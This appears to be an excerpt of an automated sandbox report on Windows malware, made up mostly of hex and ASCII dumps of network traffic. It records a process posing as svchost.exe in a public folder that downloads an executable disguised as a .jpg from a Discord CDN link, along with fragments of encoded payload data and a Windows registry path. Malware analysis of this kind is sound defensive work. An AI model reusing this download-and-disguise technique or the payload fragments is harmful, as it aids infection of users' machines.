37 39 20 30 20 37
                                                                                              Data Ascii: 65 0 73 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 82 0 100 0 65 0 68 0 69 0 106 0 72 0 65 0 65 0 53 0 89 0 100 0 115 0 65 0 80 0 79 0 7
                                                                                              2021-09-27 18:27:45 UTC3137INData Raw: 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30
                                                                                              Data Ascii: 4 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0
                                                                                              2021-09-27 18:27:45 UTC3153INData Raw: 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 36 37 20 30 20 31 31 39 20 30 20 34 38 20 30 20 34 37 20 30 20 35 36 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 31 31 20 30 20 35 32 20 30 20 35 32 20 30 20 38 33 20 30 20 34 38 20 30 20 34 37 20 30 20 34 33 20 30 20 31 32 32 20 30 20 39 39 20 30 20 35 32 20 30 20 38 30 20 30 20 34 37 20 30 20 31 31 35
                                                                                              Data Ascii: 7 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 47 0 80 0 47 0 55 0 47 0 47 0 67 0 119 0 48 0 47 0 56 0 74 0 65 0 65 0 86 0 111 0 52 0 52 0 83 0 48 0 47 0 43 0 122 0 99 0 52 0 80 0 47 0 115
                                                                                              2021-09-27 18:27:45 UTC3169INData Raw: 20 31 31 30 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 32 31 20 30 20
                                                                                              Data Ascii: 110 0 65 0 67 0 65 0 65 0 89 0 81 0 66 0 119 0 65 0 72 0 65 0 65 0 98 0 65 0 66 0 112 0 65 0 71 0 77 0 65 0 89 0 81 0 66 0 48 0 65 0 71 0 107 0 65 0 98 0 119 0 66 0 117 0 65 0 67 0 65 0 65 0 90 0 81 0 66 0 121 0 65 0 72 0 73 0 65 0 98 0 119 0 66 0 121 0
                                                                                              2021-09-27 18:27:45 UTC3185INData Raw: 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38
                                                                                              Data Ascii: 0 103 0 65 0 71 0 77 0 65 0 98 0 119 0 66 0 116 0 65 0 72 0 65 0 65 0 89 0 81 0 66 0 48 0 65 0 71 0 107 0 65 0 89 0 103 0 66 0 112 0 65 0 71 0 119 0 65 0 97 0 81 0 66 0 48 0 65 0 72 0 107 0 65 0 73 0 65 0 66 0 116 0 65 0 71 0 56 0 65 0 90 0 65 0 66 0 108
                                                                                              2021-09-27 18:27:45 UTC3201INData Raw: 35 20 30 20 36 36 20 30 20 37 30 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 32 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 38 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 34 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 38 38 20 30 20 36 35 20 30 20 36 39 20 30 20 37 37 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30
                                                                                              Data Ascii: 5 0 66 0 70 0 65 0 70 0 103 0 65 0 82 0 81 0 65 0 103 0 65 0 69 0 89 0 65 0 97 0 81 0 66 0 115 0 65 0 71 0 85 0 65 0 98 0 103 0 66 0 104 0 65 0 71 0 48 0 65 0 90 0 81 0 65 0 88 0 65 0 69 0 77 0 65 0 97 0 65 0 66 0 118 0 65 0 71 0 56 0 65 0 99 0 119 0 66 0
                                                                                              2021-09-27 18:27:45 UTC3217INData Raw: 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 30 34 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 38 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 38 31 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 38 36 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 35 32 20 30 20 36 35 20 30 20 38 39 20
                                                                                              Data Ascii: 5 0 90 0 81 0 66 0 104 0 65 0 72 0 81 0 65 0 97 0 81 0 66 0 118 0 65 0 71 0 52 0 65 0 73 0 65 0 66 0 85 0 65 0 71 0 107 0 65 0 98 0 81 0 66 0 108 0 65 0 65 0 107 0 65 0 86 0 81 0 66 0 122 0 65 0 71 0 85 0 65 0 99 0 103 0 65 0 103 0 65 0 69 0 52 0 65 0 89
                                                                                              2021-09-27 18:27:45 UTC3233INData Raw: 20 30 20 36 35 20 30 20 31 30 33 20 30 20 37 33 20 30 20 36 35 20 30 20 37 37 20 30 20 37 33 20 30 20 37 33 20 30 20 31 30 34 20 30 20 39 30 20 30 20 31 30 33 20 30 20 38 39 20 30 20 37 34 20 30 20 37 35 20 30 20 31 31 31 20 30 20 39 30 20 30 20 37 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 39 39 20 30 20 37 38 20 30 20 36 35 20 30 20 38 31 20 30 20 39 39 20 30 20 36 37 20 30 20 31 31 31 20 30 20 37 33 20 30 20 37 33 20 30 20 31 30 34 20 30 20 38 36 20 30 20 31 32 32 20 30 20 36 37 20 30 20 36 37 20 30 20 37 33 20 30 20 38 36 20 30 20 37 37 20 30 20 36 37 20 30 20 36 35 20 30 20 38 31 20 30 20 36 39 20 30 20 31 32 30 20 30 20 36 38 20 30 20 31 32 32 20 30 20 36 35 20 30 20 37 38 20 30 20 36 36 20 30 20 31 30 33 20 30 20 31 30 38 20 30 20 31 30 33 20
                                                                                              Data Ascii: 0 65 0 103 0 73 0 65 0 77 0 73 0 73 0 104 0 90 0 103 0 89 0 74 0 75 0 111 0 90 0 73 0 104 0 118 0 99 0 78 0 65 0 81 0 99 0 67 0 111 0 73 0 73 0 104 0 86 0 122 0 67 0 67 0 73 0 86 0 77 0 67 0 65 0 81 0 69 0 120 0 68 0 122 0 65 0 78 0 66 0 103 0 108 0 103
                                                                                              2021-09-27 18:27:45 UTC3249INData Raw: 30 20 30 20 35 33 20 30 20 36 36 20 30 20 31 30 30 20 30 20 38 38 20 30 20 38 32 20 30 20 31 31 31 20 30 20 39 38 20 30 20 35 31 20 30 20 37 34 20 30 20 31 31 32 20 30 20 31 30 30 20 30 20 37 32 20 30 20 31 30 37 20 30 20 31 31 37 20 30 20 38 39 20 30 20 35 31 20 30 20 37 34 20 30 20 31 31 35 20 30 20 37 37 20 30 20 37 32 20 30 20 38 39 20 30 20 37 31 20 30 20 36 37 20 30 20 36 37 20 30 20 31 31 35 20 30 20 37 31 20 30 20 36 35 20 30 20 38 31 20 30 20 38 35 20 30 20 37 30 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 36 20 30 20 36 36 20 30 20 37 31 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 39 37 20 30 20 36 38 20 30 20 36 35 20 30 20 34 37 20 30 20 36 36 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 31 31 34 20 30 20 36 36 20 30 20 31 30
                                                                                              Data Ascii: 0 0 53 0 66 0 100 0 88 0 82 0 111 0 98 0 51 0 74 0 112 0 100 0 72 0 107 0 117 0 89 0 51 0 74 0 115 0 77 0 72 0 89 0 71 0 67 0 67 0 115 0 71 0 65 0 81 0 85 0 70 0 66 0 119 0 69 0 66 0 66 0 71 0 111 0 119 0 97 0 68 0 65 0 47 0 66 0 103 0 103 0 114 0 66 0 10
                                                                                              2021-09-27 18:27:45 UTC3265INData Raw: 35 35 20 30 20 37 34 20 30 20 35 33 20 30 20 35 35 20 30 20 31 31 31 20 30 20 37 32 20 30 20 31 31 38 20 30 20 35 32 20 30 20 31 31 38 20 30 20 35 36 20 30 20 31 31 34 20 30 20 31 31 36 20 30 20 34 37 20 30 20 35 34 20 30 20 31 30 31 20 30 20 38 38 20 30 20 38 31 20 30 20 39 30 20 30 20 34 33 20 30 20 31 31 37 20 30 20 35 32 20 30 20 36 38 20 30 20 38 38 20 30 20 31 32 31 20 30 20 31 30 37 20 30 20 37 35 20 30 20 34 39 20 30 20 31 30 37 20 30 20 36 38 20 30 20 31 30 35 20 30 20 35 33 20 30 20 38 38 20 30 20 31 31 36 20 30 20 37 33 20 30 20 31 30 35 20 30 20 31 30 36 20 30 20 37 38 20 30 20 34 33 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 35 35 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 38 39 20 30 20 38 32 20 30 20 31 31 34 20 30 20 34 33 20 30 20 38
                                                                                              Data Ascii: 55 0 74 0 53 0 55 0 111 0 72 0 118 0 52 0 118 0 56 0 114 0 116 0 47 0 54 0 101 0 88 0 81 0 90 0 43 0 117 0 52 0 68 0 88 0 121 0 107 0 75 0 49 0 107 0 68 0 105 0 53 0 88 0 116 0 73 0 105 0 106 0 78 0 43 0 105 0 119 0 55 0 120 0 120 0 89 0 82 0 114 0 43 0 8
                                                                                              2021-09-27 18:27:45 UTC3281INData Raw: 30 36 20 30 20 39 38 20 30 20 35 30 20 30 20 34 38 20 30 20 31 31 39 20 30 20 36 38 20 30 20 38 31 20 30 20 38 39 20 30 20 37 34 20 30 20 37 35 20 30 20 31 31 31 20 30 20 39 30 20 30 20 37 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 39 39 20 30 20 37 38 20 30 20 36 35 20 30 20 38 31 20 30 20 36 39 20 30 20 37 37 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 37 33 20 30 20 36 36 20 30 20 36 35 20 30 20 37 31 20 30 20 34 39 20 30 20 38 35 20 30 20 31 30 33 20 30 20 39 37 20 30 20 38 35 20 30 20 31 32 32 20 30 20 38 38 20 30 20 38 32 20 30 20 39 38 20 30 20 31 30 34 20 30 20 31 31 36 20 30 20 38 36 20 30 20 37 39 20 30 20 36 36 20 30 20 31 30 37 20 30 20 38 38 20 30 20 38 38 20 30 20 31 30 32 20
                                                                                              Data Ascii: 06 0 98 0 50 0 48 0 119 0 68 0 81 0 89 0 74 0 75 0 111 0 90 0 73 0 104 0 118 0 99 0 78 0 65 0 81 0 69 0 77 0 66 0 81 0 65 0 68 0 103 0 103 0 73 0 66 0 65 0 71 0 49 0 85 0 103 0 97 0 85 0 122 0 88 0 82 0 98 0 104 0 116 0 86 0 79 0 66 0 107 0 88 0 88 0 102
                                                                                              2021-09-27 18:27:45 UTC3297INData Raw: 20 33 37 20 30 20 31 33 20 30 20 31 30 20 30 20 33 37 20 30 20 31 30 34 20 30 20 31 30 38 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 31 30 20 30 20 31 31 35 20 30 20 31 30 31 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 31 30 30 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 33 37 20 30 20 39 39 20 30 20 33 37 20 30 20 31 30 37 20 30 20 31 31 39 20 30 20 31 31 34 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 31 31 38 20 30 20 31 31 37 20 30 20 39 39 20 30 20 31 30 35 20 30 20 31 30 30 20 30 20 31 30 39 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 31 37 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 32 30 20 30 20 33 37 20 30
                                                                                              Data Ascii: 37 0 13 0 10 0 37 0 104 0 108 0 104 0 100 0 104 0 118 0 105 0 37 0 115 0 37 0 110 0 115 0 101 0 115 0 112 0 100 0 122 0 109 0 37 0 99 0 37 0 107 0 119 0 114 0 114 0 115 0 103 0 118 0 117 0 99 0 105 0 100 0 109 0 37 0 32 0 37 0 117 0 101 0 97 0 120 0 37 0
                                                                                              2021-09-27 18:27:45 UTC3309INData Raw: 20 30 20 33 37 20 30 20 39 39 20 30 20 33 37 20 30 20 31 31 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 39 37 20 30 20 39 37 20 30 20 31 31 32 20 30 20 31 31 38 20 30 20 31 32 31 20 30 20 31 30 39 20 30 20 31 31 38 20 30 20 31 30 37 20 30 20 31 31 37 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 30 37 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 39 39 20 30 20 31 30 34 20 30 20 31 31 36 20 30 20 31 32 31 20 30 20 31 31 36 20 30 20 31 31 30 20 30 20 39 38 20 30 20 31 30 37 20 30 20 31 30 39 20 30 20 39 37 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 30 34 20 30 20 31 31 36 20 30 20 31 31 32 20 30 20 33 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 31 30 32 20 30 20 31 31 36 20 30 20 31 31 33 20 30 20 31 31 31 20 30 20 39 39 20 30
                                                                                              Data Ascii: 0 37 0 99 0 37 0 111 0 97 0 100 0 97 0 97 0 112 0 118 0 121 0 109 0 118 0 107 0 117 0 37 0 32 0 37 0 107 0 115 0 103 0 99 0 104 0 116 0 121 0 116 0 110 0 98 0 107 0 109 0 97 0 37 0 115 0 37 0 104 0 116 0 112 0 37 0 116 0 37 0 102 0 116 0 113 0 111 0 99 0
                                                                                              2021-09-27 18:27:45 UTC3313INData Raw: 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 31 30 36 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 33 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 39 39 20 30 20 39 39 20 30 20 31 30 35 20 30 20 31 31 37 20 30 20 31 32 32 20 30 20 33 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 31 31 31 20 30 20 39 38 20 30 20 33 37 20 30 20 31 32 31 20 30 20 33 37 20 30 20 31 32 31 20 30 20 31 30 34 20 30 20 31 32 32 20 30 20 31 32 32 20 30 20 31 32 32 20 30 20 31 31 35 20 30 20 31 30 32 20 30 20 31 32 32 20 30 20 31 30 38 20 30 20 31 30 33 20 30 20 33 37 20 30 20 37 32 20 30 20 33 37 20 30 20 31 31 30 20 30 20 31 30 38 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20
                                                                                              Data Ascii: 0 122 0 119 0 106 0 101 0 114 0 37 0 105 0 37 0 99 0 99 0 105 0 117 0 122 0 37 0 116 0 37 0 115 0 105 0 111 0 114 0 101 0 122 0 111 0 98 0 37 0 121 0 37 0 121 0 104 0 122 0 122 0 122 0 115 0 102 0 122 0 108 0 103 0 37 0 72 0 37 0 110 0 108 0 121 0 108 0
                                                                                              2021-09-27 18:27:45 UTC3329INData Raw: 20 30 20 31 32 32 20 30 20 31 30 35 20 30 20 31 31 33 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 31 33 20 30 20 31 32 30 20 30 20 31 31 30 20 30 20 31 31 31 20 30 20 31 32 31 20 30 20 31 31 30 20 30 20 31 30 34 20 30 20 31 30 35 20 30 20 31 30 38 20 30 20 33 37 20 30 20 39 39 20 30 20 33 37 20 30 20 31 32 31 20 30 20 31 30 32 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 31 31 37 20 30 20 31 31 35 20 30 20 31 30 31 20 30 20 31 30 30 20 30 20 31 31 39 20 30 20 31 30 38 20 30 20 31 30 34 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 30 37 20 30 20 31 31 32 20 30 20 31 31 37 20 30 20 31 31 39 20 30 20 31 31 33 20 30 20 31 31 37 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 31 36 20 30 20 31 31 34 20
                                                                                              Data Ascii: 0 122 0 105 0 113 0 37 0 115 0 37 0 113 0 120 0 110 0 111 0 121 0 110 0 104 0 105 0 108 0 37 0 99 0 37 0 121 0 102 0 101 0 103 0 117 0 115 0 101 0 100 0 119 0 108 0 104 0 37 0 32 0 37 0 107 0 112 0 117 0 119 0 113 0 117 0 119 0 37 0 115 0 37 0 116 0 114
                                                                                              2021-09-27 18:27:45 UTC3341INData Raw: 32 20 30 20 39 32 20 30 20 38 33 20 30 20 31 31 31 20 30 20 31 30 32 20 30 20 31 31 36 20 30 20 31 31 39 20 30 20 39 37 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 39 32 20 30 20 37 37 20 30 20 31 30 35 20 30 20 39 39 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 31 31 35 20 30 20 31 31 31 20 30 20 31 30 32 20 30 20 31 31 36 20 30 20 39 32 20 30 20 38 37 20 30 20 31 30 35 20 30 20 31 31 30 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 31 31 35 20 30 20 39 32 20 30 20 36 37 20 30 20 31 31 37 20 30 20 31 31 34 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 31 31 30 20 30 20 31 31 36 20 30 20 38 36 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 39 32 20 30 20 37 38 20 30 20
                                                                                              Data Ascii: 2 0 92 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 92 0 87 0 105 0 110 0 100 0 111 0 119 0 115 0 92 0 67 0 117 0 114 0 114 0 101 0 110 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 92 0 78 0
                                                                                              2021-09-27 18:27:45 UTC3357INData Raw: 20 32 32 39 20 38 33 20 32 34 39 20 38 33 20 32 31 20 38 34 20 31 38 20 38 34 20 31 39 20 38 34 20 31 39 20 38 34 20 32 33 30 20 38 33 20 32 32 36 20 38 33 20 32 32 36 20 38 33 20 31 20 33 31 20 31 30 39 20 32 35 33 20 31 30 38 20 32 35 33 20 31 34 37 20 32 35 33 20 31 31 33 20 32 35 33 20 31 37 30 20 32 35 33 20 31 35 39 20 32 35 33 20 31 35 36 20 32 35 33 20 31 31 32 20 32 35 33 20 31 30 38 20 32 35 33 20 31 30 36 20 32 35 33 20 31 31 34 20 32 35 33 20 31 30 38 20 32 35 33 20 31 30 39 20 32 35 33 20 31 37 39 20 32 35 33 20 31 36 36 20 32 35 33 20 31 20 33 31 20 31 31 32 20 35 20 31 36 34 20 35 20 31 36 33 20 35 20 31 32 30 20 35 20 31 36 30 20 35 20 31 36 32 20 35 20 31 31 31 20 35 20 31 37 38 20 35 20 31 33 31 20 35 20 31 32 30 20 35 20 31 33 34 20 35
                                                                                              Data Ascii: 229 83 249 83 21 84 18 84 19 84 19 84 230 83 226 83 226 83 1 31 109 253 108 253 147 253 113 253 170 253 159 253 156 253 112 253 108 253 106 253 114 253 108 253 109 253 179 253 166 253 1 31 112 5 164 5 163 5 120 5 160 5 162 5 111 5 178 5 131 5 120 5 134 5
                                                                                              2021-09-27 18:27:45 UTC3373INData Raw: 20 31 33 30 20 31 30 39 20 31 20 32 20 35 20 33 32 20 31 20 31 20 32 39 20 33 20 32 35 20 37 20 35 20 31 38 20 33 37 20 31 38 20 31 33 30 20 36 35 20 31 38 20 31 33 30 20 37 33 20 32 31 20 31 37 20 31 33 30 20 36 39 20 31 20 31 38 20 34 31 20 32 31 20 31 37 20 31 33 30 20 36 39 20 31 20 31 38 20 31 33 30 20 36 35 20 34 20 33 32 20 31 20 38 20 33 20 35 20 33 32 20 32 20 31 34 20 31 34 20 31 34 20 37 20 37 20 32 20 31 38 20 34 35 20 31 37 20 31 33 30 20 37 37 20 38 20 31 36 20 31 20 32 20 33 30 20 30 20 33 30 20 30 20 31 34 20 34 20 31 30 20 31 20 31 38 20 35 33 20 35 20 37 20 32 20 31 38 20 37 37 20 32 20 34 20 31 30 20 31 20 31 38 20 35 37 20 35 20 33 32 20 31 20 31 38 20 37 37 20 33 20 34 20 31 30 20 31 20 31 38 20 36 31 20 36 20 30 20 33 20 31 34 20 31
                                                                                              Data Ascii: 130 109 1 2 5 32 1 1 29 3 25 7 5 18 37 18 130 65 18 130 73 21 17 130 69 1 18 41 21 17 130 69 1 18 130 65 4 32 1 8 3 5 32 2 14 14 14 7 7 2 18 45 17 130 77 8 16 1 2 30 0 30 0 14 4 10 1 18 53 5 7 2 18 77 2 4 10 1 18 57 5 32 1 18 77 3 4 10 1 18 61 6 0 3 14 1


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.549748162.159.130.233443C:\Users\Public\Documents\???????????????\svchost.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-09-27 18:28:01 UTC3380OUTGET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1
                                                                                              Host: cdn.discordapp.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-09-27 18:28:01 UTC3380INHTTP/1.1 200 OK
                                                                                              Date: Mon, 27 Sep 2021 18:28:01 GMT
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Length: 1729443
                                                                                              Connection: close
                                                                                              CF-Ray: 6956ca128c49375b-MXP
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 1203
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              ETag: "2ac5f86f290ec12916b30b63f8da6e5d"
                                                                                              Expires: Tue, 27 Sep 2022 18:28:01 GMT
                                                                                              Last-Modified: Thu, 23 Sep 2021 20:00:54 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              Cf-Bgj: h2pri
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1632427254972338
                                                                                              x-goog-hash: crc32c=rCGZkw==
                                                                                              x-goog-hash: md5=KsX4bykOwSkWswtj+NpuXQ==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 1729443
                                                                                              X-GUploader-UploadID: ADPycdsfSu6fJtDW9HkahbvMR-roS5LUPKi7V3J3d7FUAokax5jZBtayADlbxIAInHxVI5ODwjSxTSzUsmwOnTRs4zDOFAag8w
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zwQ%2BrO8ScAH%2FkFs48IAuzgxuSS%2FIBMMsuh%2FO0hiVZtWCRo0%2FyQ%2BNiahUHSWBpn0yWPHn9nD56ZkkI8RgYBBAD5ryRmSKZ2RnHihpzCjK2bjhYfyzcByreiW4ulJy4qaTb5RqHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2021-09-27 18:28:01 UTC3382INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2021-09-27 18:28:01 UTC3382INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
